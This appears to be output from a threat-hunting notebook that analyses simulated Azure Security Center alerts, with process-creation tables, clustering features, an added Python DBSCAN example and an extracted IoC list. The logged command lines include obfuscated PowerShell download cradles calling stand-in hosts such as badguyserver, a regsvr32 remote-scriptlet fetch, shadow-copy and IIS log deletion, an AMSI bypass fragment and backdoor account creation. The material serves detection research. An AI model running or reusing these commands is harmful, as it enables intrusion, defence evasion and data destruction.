Alert summary (count and first/last occurrence per AlertName):

| | AlertName | alertCount | firstAlert | lastAlert |
|---|---|---|---|---|
| 0 | Suspicious Powershell Activity Detected | 16 | 2019-01-15 05:15:14 | 2019-01-15 17:15:15 |
| 1 | Suspicious process executed | 11 | 2019-01-12 00:02:51 | 2019-01-15 17:15:19 |
| 2 | Executable found running from a suspicious location | 9 | 2019-01-15 05:15:20 | 2019-01-15 17:15:19 |
| 3 | DC local group addition - Demo | 6 | 2019-01-10 06:41:45 | 2019-01-15 06:41:46 |
| 4 | Palo Alto admin logged on via SSH - Demo | 6 | 2019-01-10 06:41:50 | 2019-01-15 06:41:55 |
| 5 | DC with MS AM engine failure - Demo | 6 | 2019-01-10 06:43:59 | 2019-01-15 06:44:00 |
| 6 | Suspicious Account Added | 6 | 2019-01-10 20:38:16 | 2019-01-15 22:28:16 |
| 7 | Global domain trust creation - Demo | 6 | 2019-01-10 05:48:09 | 2019-01-15 05:48:11 |
| 8 | Maliciuos IP communication | 6 | 2019-01-10 06:36:03 | 2019-01-15 06:36:02 |
| 9 | Suspicious double extension file executed | 6 | 2019-01-12 00:02:51 | 2019-01-15 17:15:23 |
| 10 | Suspicious SVCHOST process executed | 6 | 2019-01-12 00:02:51 | 2019-01-15 17:15:23 |
| 11 | Azure Security Center test alert (not a threat) | 5 | 2019-01-15 05:15:25 | 2019-01-15 17:15:23 |
| 12 | Suspicious system process executed | 5 | 2019-01-15 05:15:20 | 2019-01-15 17:15:19 |
| 13 | Suspicious Volume Shadow Copy Activity | 5 | 2019-01-15 05:15:20 | 2019-01-15 17:15:23 |
| 14 | Rare SVCHOST service group executed | 5 | 2019-01-15 05:15:25 | 2019-01-15 17:15:23 |
| 15 | Ransomware indicators detected | 5 | 2019-01-15 05:15:25 | 2019-01-15 17:15:23 |
| 16 | Detected Petya ransomware indicators | 5 | 2019-01-15 05:15:25 | 2019-01-15 17:15:23 |
| 17 | Suspiciously named process detected | 5 | 2019-01-15 05:15:15 | 2019-01-15 17:15:17 |
| 18 | Suspicious WindowPosition registry value detected | 5 | 2019-01-15 05:15:20 | 2019-01-15 17:15:19 |
| 19 | Detected obfuscated command line. | 4 | 2019-01-15 05:15:14 | 2019-01-15 17:15:15 |
Selected alert (row 101):

| | 101 |
|---|---|
| TenantId | 802d39e1-9d70-404d-832c-2de5e2478eda |
| StartTimeUtc | 2019-01-15 05:15:15 |
| EndTimeUtc | 2019-01-15 05:15:15 |
| ProviderAlertId | 265472ff-3820-4dad-8da7-00e39e1a99fd |
| SystemAlertId | 2518547714843218505_265472ff-3820-4dad-8da7-00e39e1a99fd |
| ProviderName | Detection |
| VendorName | Microsoft |
| AlertType | Detected suspicious use of FTP -s Switch |
| AlertName | Detected suspicious use of FTP -s Switch |
| AlertDisplayName | Detected suspicious use of FTP -s Switch |
| Description | Analysis of process creation data from the MSTICALERTSWIN1 detected the use of FTP's "-s:filenam... |
| Severity | Medium |
| IsIncident | False |
| ExtendedProperties | {'Compromised Host': 'MSTICALERTSWIN1', 'User Name': 'MSTICALERTSWIN1\MSTICAdmin', 'Account Sess... |
| Entities | [{'$id': '4', 'DnsDomain': '', 'NTDomain': '', 'HostName': 'MSTICALERTSWIN1', 'NetBiosName': 'MS... |
| ConfidenceLevel | Unknown |
| ConfidenceScore | NaN |
| ExtendedLinks | |
| WorkspaceSubscriptionId | 3c1bb38c-82e3-4f8d-a115-a7110ba70d05 |
| WorkspaceResourceGroup | contoso77 |
| TimeGenerated | 2019-01-15 05:15:20 |
| ResourceId | /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/provide... |
| SourceComputerId | 46fe7078-61bb-4bed-9430-7ac01d91c273 |
| CompromisedEntity | MSTICALERTSWIN1 |
ExtendedProperties of the selected alert:

| | 0 |
|---|---|
| Compromised Host | MSTICALERTSWIN1 |
| User Name | MSTICALERTSWIN1\MSTICAdmin |
| Account Session Id | 0xfaac27 |
| Suspicious Process | c:\diagnostics\usertmp\ftp.exe |
| Suspicious Command Line | .\ftp -s:c:\recycler\xxppyy.exe |
| Parent Process | c:\windows\system32\cmd.exe |
| Suspicious Process Id | 0x1580 |
| resourceType | Virtual Machine |
| ServiceId | 14fa08c7-c48e-4c18-950c-8148024b4398 |
| ReportingSystem | Azure |
| OccuringDatacenter | eastus |
Process-creation events with the clustering features (ClusterSize, commandlineTokensFull, pathScore, isSystemSession):

| | TimeGenerated | LastEventTime | NewProcessName | CommandLine | ClusterSize | commandlineTokensFull | pathScore | isSystemSession |
|---|---|---|---|---|---|---|---|---|
| 292 | 2019-01-15 04:23:43.103 | 2019-01-15 04:45:24.523 | C:\Windows\System32\taskhostw.exe | taskhostw.exe SYSTEM | 1.0 | 2 | 3262 | True |
| 270 | 2019-01-15 04:28:01.517 | 2019-01-15 04:28:33.090 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler | 2.0 | 17 | 4895 | True |
| 133 | 2019-01-15 04:35:15.673 | 2019-01-15 04:45:24.523 | C:\Windows\System32\sppsvc.exe | C:\Windows\system32\sppsvc.exe | 1.0 | 5 | 2933 | True |
| 134 | 2019-01-15 04:35:16.060 | 2019-01-15 04:45:24.523 | C:\Windows\System32\wbem\WmiPrvSE.exe | C:\Windows\system32\wbem\wmiprvse.exe -Embedding | 1.0 | 8 | 3546 | True |
| 254 | 2019-01-15 04:42:25.437 | 2019-01-15 05:12:25.403 | C:\Windows\System32\MusNotification.exe | C:\Windows\system32\MusNotification.exe Display | 2.0 | 6 | 3826 | True |
| 256 | 2019-01-15 04:43:05.240 | 2019-01-15 04:45:24.523 | C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe | "CollectGuestLogs.exe" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df... | 1.0 | 18 | 6421 | True |
| 301 | 2019-01-15 04:44:37.180 | 2019-01-15 04:45:24.523 | C:\Windows\System32\cmd.exe | "cmd" | 1.0 | 2 | 2570 | True |
| 356 | 2019-01-15 04:45:24.523 | 2019-01-15 04:45:24.523 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe... | 1.0 | 27 | 9108 | True |
| 74 | 2019-01-15 05:15:03.017 | 2019-01-15 04:45:24.523 | C:\Windows\System32\dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | 1.0 | 12 | 3024 | True |
| 75 | 2019-01-15 05:15:03.047 | 2019-01-15 04:45:24.523 | C:\Windows\System32\cmd.exe | cmd.exe /c c:\Diagnostics\WindowsSimulateDetections.bat c:\Diagnostics\UserTmp | 1.0 | 12 | 2570 | True |
| 77 | 2019-01-15 05:15:03.247 | 2019-01-15 05:15:11.260 | C:\Windows\System32\cmd.exe | cmd /c echo Any questions about the commands executed here then please contact one of | 2.0 | 16 | 2570 | False |
| 78 | 2019-01-15 05:15:03.257 | 2019-01-15 04:45:24.523 | C:\Windows\System32\cmd.exe | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... | 1.0 | 21 | 2570 | False |
| 80 | 2019-01-15 05:15:03.410 | 2019-01-15 05:15:14.693 | C:\Windows\System32\net1.exe | C:\Windows\system32\net1 user adm1nistrator Bob_testing /add | 7.0 | 10 | 2638 | False |
| 82 | 2019-01-15 05:15:03.517 | 2019-01-15 04:45:24.523 | C:\Windows\System32\net1.exe | C:\Windows\system32\net1 share TestShare=c:\testshare /Grant:Users,Read | 1.0 | 13 | 2638 | False |
| 83 | 2019-01-15 05:15:03.543 | 2019-01-15 04:45:24.523 | C:\Windows\System32\Dism.exe | dism /online /enable-feature /featurename:File-Services /NoRestart | 1.0 | 11 | 2659 | True |
| 85 | 2019-01-15 05:15:03.830 | 2019-01-15 05:15:19.447 | C:\Windows\System32\net.exe | net use q: \\MSTICAlertsWin1\TestShare Bob_testing /User:adm1nistrator | 3.0 | 12 | 2589 | False |
| 86 | 2019-01-15 05:15:03.850 | 2019-01-15 04:45:24.523 | C:\Windows\Temp\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\DismHost.exe | C:\Windows\TEMP\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\dismhost.exe {D57BA872-53C0-424D-80AE-E4911... | 1.0 | 15 | 4900 | True |
| 87 | 2019-01-15 05:15:04.507 | 2019-01-15 04:45:24.523 | C:\Windows\servicing\TrustedInstaller.exe | C:\Windows\servicing\TrustedInstaller.exe | 1.0 | 5 | 4175 | True |
| 94 | 2019-01-15 05:15:10.753 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\regsvr32.exe | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | 1.0 | 20 | 3399 | False |
| 95 | 2019-01-15 05:15:10.817 | 2019-01-15 05:15:14.453 | C:\Windows\System32\svchost.exe | C:\Windows\system32\svchost.exe -k wsappx | 2.0 | 8 | 3040 | True |
| 96 | 2019-01-15 05:15:11.190 | 2019-01-15 05:15:14.453 | C:\Windows\System32\win32calc.exe | "C:\Windows\System32\win32calc.exe" | 28.0 | 8 | 3100 | False |
| 122 | 2019-01-15 05:15:11.947 | 2019-01-15 05:15:14.563 | C:\Diagnostics\UserTmp\implant.exe | implant.exe k111 | 7.0 | 3 | 3390 | False |
| 125 | 2019-01-15 05:15:12.123 | 2019-01-15 05:15:14.157 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" | 3.0 | 21 | 2941 | False |
| 130 | 2019-01-15 05:15:12.393 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... | 1.0 | 25 | 3726 | False |
| 139 | 2019-01-15 05:15:12.847 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -command "(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'... | 1.0 | 36 | 3726 | False |
| 104 | 2019-01-15 05:15:12.977 | 2019-01-15 05:15:19.583 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | 2.0 | 24 | 3726 | False |
| 106 | 2019-01-15 05:15:13.100 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... | 1.0 | 68 | 3726 | False |
| 108 | 2019-01-15 05:15:13.220 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+("{2}{0}{1}"-f ':/','/past... | 1.0 | 53 | 3726 | False |
| 110 | 2019-01-15 05:15:13.337 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | 1.0 | 46 | 2941 | False |
| 142 | 2019-01-15 05:15:15.233 | 2019-01-15 05:15:14.770 | C:\Windows\System32\whoami.exe | whoami | 3.0 | 0 | 2907 | False |
| 149 | 2019-01-15 05:15:15.520 | 2019-01-15 05:15:15.923 | C:\Windows\System32\net.exe | net group "Domain Admins" /domain | 2.0 | 8 | 2589 | False |
| 162 | 2019-01-15 05:15:16.020 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript.Shell").Run(".\powershell.e... | 1.0 | 56 | 2941 | False |
| 163 | 2019-01-15 05:15:16.067 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\netsh.exe | .\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\users\Bob\appdata\Ro... | 1.0 | 18 | 3179 | False |
| 46 | 2019-01-15 05:15:16.167 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\reg.exe | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | 1.0 | 16 | 2951 | False |
| 47 | 2019-01-15 05:15:16.277 | 2019-01-15 05:15:14.613 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "systeminfo && systeminfo" | 23.0 | 10 | 2941 | False |
| 48 | 2019-01-15 05:15:16.340 | 2019-01-15 05:15:14.293 | C:\Diagnostics\UserTmp\rundll32.exe | .\rundll32 /C 12345.exe | 15.0 | 7 | 3391 | False |
| 49 | 2019-01-15 05:15:16.353 | 2019-01-15 05:15:16.520 | C:\Diagnostics\UserTmp\12345.exe | 12345.exe | 3.0 | 1 | 2888 | False |
| 56 | 2019-01-15 05:15:16.563 | 2019-01-15 05:15:18.403 | C:\Diagnostics\UserTmp\reg.exe | .\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue | 3.0 | 15 | 2951 | False |
| 57 | 2019-01-15 05:15:16.613 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\tsetup.1.exe | c:\Diagnostics\UserTmp\tsetup.1.exe C:\Users\MSTICAdmin\AppData\Local\Temp\2\is-01DD7.tmp\tsetu... | 1.0 | 40 | 3405 | False |
| 59 | 2019-01-15 05:15:16.677 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\netsh.exe | .\netsh.exe "in (*.exe) do start # artificial commandline solely for purposes of triggering test" | 1.0 | 22 | 3179 | False |
| 60 | 2019-01-15 05:15:16.720 | 2019-01-15 05:15:15.880 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&ec... | 3.0 | 25 | 2941 | False |
| 61 | 2019-01-15 05:15:16.767 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell Enable-WSManCredSSP =2013Role Server -force&ech... | 1.0 | 28 | 2941 | False |
| 62 | 2019-01-15 05:15:16.807 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell winrm set winrm/config/service/Auth @{Kerberos=... | 1.0 | 31 | 2941 | False |
| 63 | 2019-01-15 05:15:16.850 | 2019-01-15 05:15:17.580 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\ProgramData"&copy \\[REDACTED]\c$\users\[REDACTED]\Documents\"Password Chan... | 2.0 | 29 | 2941 | False |
| 64 | 2019-01-15 05:15:16.893 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&c:\windows\system32\inetsrv\appcmd set config "Default Web... | 1.0 | 41 | 2941 | False |
| 65 | 2019-01-15 05:15:16.967 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&del C:\inetpub\logs\logFiles\W3SVC1\*.log /q&echo [S]&cd&e... | 1.0 | 32 | 2941 | False |
| 67 | 2019-01-15 05:15:17.077 | 2019-01-15 05:15:19.617 | C:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe | c:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe | 9.0 | 6 | 5005 | False |
| 68 | 2019-01-15 05:15:17.127 | 2019-01-15 05:15:18.630 | C:\Diagnostics\UserTmp\doubleextension.pdf.exe | c:\Diagnostics\UserTmp\doubleextension.pdf.exe | 7.0 | 7 | 4617 | False |
| 69 | 2019-01-15 05:15:17.137 | 2019-01-15 05:15:12.067 | C:\Windows\System32\vssadmin.exe | vssadmin delete shadows /all /quiet | 4.0 | 7 | 3131 | False |
| 169 | 2019-01-15 05:15:17.410 | 2019-01-15 05:15:14.640 | C:\Diagnostics\UserTmp\svchost.exe | c:\Diagnostics\UserTmp\svchost.exe | 6.0 | 6 | 3411 | False |
| 171 | 2019-01-15 05:15:17.493 | 2019-01-15 04:45:24.523 | C:\Windows\System32\svchost.exe | c:\Windows\System32\svchost.exe -k malicious | 1.0 | 9 | 3040 | False |
| 176 | 2019-01-15 05:15:18.080 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\wuauclt.exe | .\wuauclt.exe /C "c:\windows\softwaredistribution\cscript.exe" | 1.0 | 14 | 3406 | False |
| 190 | 2019-01-15 05:15:18.287 | 2019-01-15 05:15:18.967 | C:\Diagnostics\UserTmp\lsass.exe | .\lsass.exe /C "c:\windows\softwaredistribution\cscript.exe" | 2.0 | 14 | 3183 | False |
| 193 | 2019-01-15 05:15:18.337 | 2019-01-15 05:02:28.260 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "powershell wscript.shell used to download a .gif" | 5.0 | 14 | 2941 | False |
| 195 | 2019-01-15 05:15:18.450 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "cd /d "C:\inetpub\wwwroot"&c:\windows\system32\inetsrv\appcmd set config "Default Web S... | 1.0 | 39 | 2941 | False |
| 198 | 2019-01-15 05:15:18.553 | 2019-01-15 04:45:24.523 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c echo " SYSTEMINFO && SYSTEMINFO && DEL " | 1.0 | 17 | 2941 | False |
| 211 | 2019-01-15 05:15:19.223 | 2019-01-15 05:15:19.337 | C:\Diagnostics\UserTmp\hd.exe | hd.exe -pslist | 2.0 | 4 | 2837 | False |
| 219 | 2019-01-15 05:15:20.623 | 2019-01-15 04:45:24.523 | C:\Windows\System32\wermgr.exe | C:\Windows\system32\wermgr.exe -upload | 1.0 | 7 | 2922 | True |
| 0 | 2019-01-15 05:24:24.010 | 2019-01-15 04:46:24.017 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\De... | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\D... | 35.0 | 52 | 12225 | True |
| 1 | 2019-01-15 05:24:24.023 | 2019-01-15 04:46:24.033 | C:\Windows\System32\conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 39.0 | 10 | 3028 | True |
| 2 | 2019-01-15 05:24:25.807 | 2019-01-15 04:46:25.800 | C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding | 38.0 | 10 | 3478 | True |
| 3 | 2019-01-15 05:24:26.010 | 2019-01-15 04:46:26.007 | C:\Windows\System32\cscript.exe | "C:\Windows\system32\cscript.exe" /nologo "MonitorKnowledgeDiscovery.vbs" | 71.0 | 13 | 3022 | True |
Clustered reg.exe events (ClusterId -1 = noise, i.e. a one-off command):

| | ClusterSize | processName | CommandLine | ClusterId |
|---|---|---|---|---|
| 46 | 1.0 | reg.exe | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | -1.0 |
| 56 | 3.0 | reg.exe | .\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue | 7.0 |
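The two tables above are the output of the clustering step: each process-creation event is reduced to a few numeric features and events with (near-)identical features are grouped, so that a command line seen many times collapses into one row with a large ClusterSize while a one-off command such as the `.\reg not /domain:...` line is left as noise (ClusterId -1). The following is an added example of that technique, not code from the original notebook or from msticpy. It assumes pathScore is the sum of the character ordinals of NewProcessName (this reproduces the table's values, for instance C:\Windows\System32\cmd.exe gives 2570), approximates commandlineTokensFull by a delimiter count that may differ by one or two from the notebook's own feature, derives isSystemSession from the SYSTEM logon id 0x3e7, and uses a small pure-Python DBSCAN on min-max scaled features. The events are constructed from rows of the table, not queried from a workspace.

```python
"""Rare-process detection by clustering process-creation events (added example)."""
import math
import re
from typing import Dict, List, Sequence, Tuple

# Characters treated as delimiters when counting "tokens" (assumed feature definition).
_DELIMS = re.compile(r"""[\s\\/\-.,"'|&:;%$()]""")


def path_score(path: str) -> int:
    """Sum of character ordinals: a cheap numeric encoding of the image path."""
    return sum(ord(ch) for ch in path)


def token_count(command_line: str) -> int:
    """Delimiter count of the command line, a proxy for argument complexity."""
    return len(_DELIMS.findall(command_line or ""))


def featurize(events: Sequence[Dict]) -> List[Tuple[float, float, float]]:
    """(commandlineTokensFull, pathScore, isSystemSession) per event."""
    return [
        (
            float(token_count(ev["CommandLine"])),
            float(path_score(ev["NewProcessName"])),
            1.0 if ev["SubjectLogonId"].lower() == "0x3e7" else 0.0,  # assumed SYSTEM logon id
        )
        for ev in events
    ]


def min_max_scale(rows: List[Tuple[float, ...]]) -> List[Tuple[float, ...]]:
    """Scale each feature to [0, 1] so pathScore (thousands) cannot dominate distances."""
    n_feat = len(rows[0])
    lo = [min(r[i] for r in rows) for i in range(n_feat)]
    hi = [max(r[i] for r in rows) for i in range(n_feat)]
    return [
        tuple((r[i] - lo[i]) / (hi[i] - lo[i]) if hi[i] > lo[i] else 0.0 for i in range(n_feat))
        for r in rows
    ]


def _dist(a, b) -> float:
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def dbscan(points, eps: float, min_samples: int) -> List[int]:
    """Minimal DBSCAN; returns one cluster id per point, -1 for noise."""
    n = len(points)
    nbrs = [[j for j in range(n) if _dist(points[i], points[j]) <= eps] for i in range(n)]
    labels: List = [None] * n
    cluster = 0
    for i in range(n):
        if labels[i] is not None:
            continue
        if len(nbrs[i]) < min_samples:
            labels[i] = -1           # noise for now; may become a border point later
            continue
        labels[i] = cluster
        queue = list(nbrs[i])
        while queue:
            j = queue.pop()
            if labels[j] == -1:
                labels[j] = cluster  # border point: joins the cluster, is not expanded
            if labels[j] is not None:
                continue
            labels[j] = cluster
            if len(nbrs[j]) >= min_samples:
                queue.extend(nbrs[j])
        cluster += 1
    return labels


def cluster_processes(events: Sequence[Dict], eps: float = 0.05, min_samples: int = 3) -> List[Tuple[int, int]]:
    """(ClusterId, ClusterSize) per event; noise gets (-1, 1)."""
    labels = dbscan(min_max_scale(featurize(events)), eps, min_samples)
    size = {lab: labels.count(lab) for lab in set(labels)}
    return [(lab, 1 if lab == -1 else size[lab]) for lab in labels]


def _ev(path: str, cmd: str, logon: str, times: int = 1) -> List[Dict]:
    return [{"NewProcessName": path, "CommandLine": cmd, "SubjectLogonId": logon}] * times


# Constructed from rows of the table above (repeat counts follow ClusterSize there).
SAMPLE_EVENTS = (
    _ev(r"C:\Windows\System32\taskhostw.exe", "taskhostw.exe SYSTEM", "0x3e7")
    + _ev(r"C:\Windows\System32\whoami.exe", "whoami", "0xfaac27", times=3)
    + _ev(r"C:\Diagnostics\UserTmp\reg.exe", r".\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue", "0xfaac27", times=3)
    + _ev(r"C:\Diagnostics\UserTmp\reg.exe", r".\reg not /domain:everything that /sid:shines is /krbtgt:golden !", "0xfaac27")
    + _ev(r"C:\Windows\System32\cmd.exe", '"cmd"', "0x3e7")
)

if __name__ == "__main__":
    for ev, (cid, csize) in zip(SAMPLE_EVENTS, cluster_processes(SAMPLE_EVENTS)):
        print(f"{cid:>3} {csize:>2}  {ev['CommandLine']}")
```

The eps value matters: the two reg.exe lines share an image path and differ only in delimiter count, so a looser eps (0.1 with this scaling) would pull the one-off `.\reg not ...` into the `reg.exe add` cluster as a border point and hide it. Scaling is also why the raw pathScore cannot be fed to DBSCAN directly; without it every event with a distinct image path is trivially far from every other and the token feature never contributes.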
IoCs extracted from the process command lines (SourceIndex = index of the source row):

| | IoCType | Observable | SourceIndex |
|---|---|---|---|
| 0 | windows_path | C:\RECYCLER\xxppyy.exe | 0 |
| 1 | windows_path | .\ftp | 0 |
| 2 | windows_path | .\reg | 1 |
| 3 | windows_path | .\rundll32 | 3 |
| 4 | windows_path | c:\users\MSTICAdmin\12345.exe | 4 |
| 5 | windows_path | .\rundll32 | 4 |
| 6 | windows_path | .\rundll32 | 5 |
| 7 | windows_path | .\rundll32 | 6 |
| 8 | windows_path | c:\users\MSTICAdmin\1234.exe | 6 |
| 9 | windows_path | .\rundll32 | 7 |
| 10 | windows_path | .\reg.exe add \hkcu\software\microsoft\some\key\Run | 8 |
| 11 | dns | tsetup.1.exe | 9 |
| 12 | dns | tsetup.1.0.14.tmp | 9 |
| 13 | dns | tsetup.1.0.14.exe | 9 |
| 14 | windows_path | c:\Diagnostics\UserTmp\tsetup.1.exe | 9 |
| 15 | windows_path | C:\Users\MSTICAdmin\AppData\Local\Temp\2\is-01DD7.tmp\tsetup.1.0.14.tmp | 9 |
| 16 | windows_path | C:\Users\MSTICAdmin\Downloads\tsetup.1.0.14.exe | 9 |
| 17 | windows_path | .\rundll32.exe | 10 |
| 18 | windows_path | .\netsh.exe | 11 |
| 19 | windows_path | C:\inetpub\wwwroot | 12 |
| 20 | windows_path | .\cmd | 12 |
| 21 | windows_path | C:\inetpub\wwwroot | 13 |
| 22 | windows_path | .\cmd | 13 |
| 23 | windows_path | C:\inetpub\wwwroot | 14 |
| 24 | windows_path | .\cmd | 14 |
| 25 | windows_path | \\[REDACTED]\c$\users\[REDACTED]\Documents | 15 |
| 26 | windows_path | .\cmd | 15 |
| 27 | windows_path | C:\ProgramData | 15 |
| 28 | windows_path | c:\windows\system32\inetsrv\appcmd | 16 |
| 29 | windows_path | C:\inetpub\wwwroot | 16 |
| 30 | windows_path | .\cmd | 16 |
| 31 | windows_path | C:\inetpub\logs\logFiles\W3SVC1 | 17 |
| 32 | windows_path | C:\inetpub\wwwroot | 17 |
| 33 | windows_path | .\cmd | 17 |
| 34 | windows_path | c:\Diagnostics\UserTmp\perfc.dat | 18 |
| 35 | windows_path | c:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe | 19 |
| 36 | dns | doubleextension.pdf.exe | 20 |
| 37 | windows_path | c:\Diagnostics\UserTmp\doubleextension.pdf.exe | 20 |
| 38 | windows_path | \C: | 22 |
| 39 | windows_path | \Windows\system32\conhost.exe | 22 |
| 40 | windows_path | c:\testshare | 26 |
| 41 | windows_path | \\MSTICAlertsWin1\TestShare | 27 |
| 42 | url | http://server/file.sct | 31 |
| 43 | dns | server | 31 |
| 44 | windows_path | .\regsvr32 | 31 |
| 45 | windows_path | .\suchost.exe | 32 |
| 46 | windows_path | .\evil.ps1; | 35 |
| 47 | windows_path | .\powershell.exe | 35 |
| 48 | windows_path | .\powershell | 36 |
| 49 | url | http://somedomain/best-kitten-names-1.jpg' | 37 |
| 50 | dns | somedomain | 37 |
| 51 | windows_path | \AppData\Local\Temp\kittens1.jpg'; | 37 |
| 52 | windows_path | C:\Users\$env:UserName | 37 |
| 53 | windows_path | .\pOWErS^H^ElL^.eX^e^ | 37 |
| 54 | windows_path | .\n^e^t | 38 |
| 55 | windows_path | .\powershell | 39 |
| 56 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 40 |
| 57 | md5_hash | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | 41 |
| 58 | md5_hash | 81ed03caf6901e444c72ac67d192fb9c | 44 |
| 59 | url | http://badguyserver/pwnme" | 46 |
| 60 | dns | badguyserver | 46 |
| 61 | url | http://badguyserver/pwnme" | 47 |
| 62 | dns | badguyserver | 47 |
| 63 | windows_path | .\powershell | 47 |
| 64 | windows_path | .\powershell | 48 |
| 65 | windows_path | .\powershell | 49 |
| 66 | windows_path | .\powershell | 50 |
| 67 | windows_path | .\rUnDlL32 | 58 |
| 68 | windows_path | .\reg query add mscfile\\\\open | 59 |
| 69 | windows_path | .\reg | 60 |
| 70 | windows_path | .\dubrute.exe | 61 |
| 71 | windows_path | .\nlbrute.exe | 62 |
| 72 | windows_path | .\reg | 63 |
| 73 | windows_path | \system\CurrentControlSet\Control\Terminal | 63 |
| 74 | windows_path | .\reg | 64 |
| 75 | windows_path | \system\CurrentControlSet\Control\Terminal | 64 |
| 76 | windows_path | \\tsclient\c | 65 |
| 77 | windows_path | \Microsoft\Windows\CurrentVersion Certificate).Certificate);.\powershell | 67 |
| 78 | windows_path | .\powershell.exe | 67 |
| 79 | windows_path | C:\Windows\System32\mshta.exe | 67 |
| 80 | windows_path | c:\users\Bob\appdata\Roaming\RbtGskQ\RbtGskQ.exe | 68 |
| 81 | windows_path | .\netsh | 68 |
| 82 | windows_path | .\reg add HKLM\KEY_LOCAL_MACHINE\...securityproviders\wdigest | 69 |
| 83 | windows_path | c:\Windows\System32\cmd.exe | 70 |
| 84 | windows_path | c:\Diagnostics\UserTmp\scrsave.scr | 71 |
| 85 | windows_path | c:\Diagnostics\UserTmp\svchost.exe | 72 |
| 86 | windows_path | c:\Diagnostics\UserTmp\smss.exe | 73 |
| 87 | windows_path | c:\Windows\System32\svchost.exe | 74 |
| 88 | dns | system.management.automation.amsiutils | 77 |
| 89 | dns | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | 77 |
| 90 | url | http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | 77 |
| 91 | windows_path | .\powershell.exe | 77 |
| 92 | ipv4 | 1.2.3.4 | 78 |
| 93 | windows_path | C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt | 78 |
| 94 | windows_path | .\wuauclt.exe | 79 |
| 95 | windows_path | c:\windows\softwaredistribution\cscript.exe | 79 |
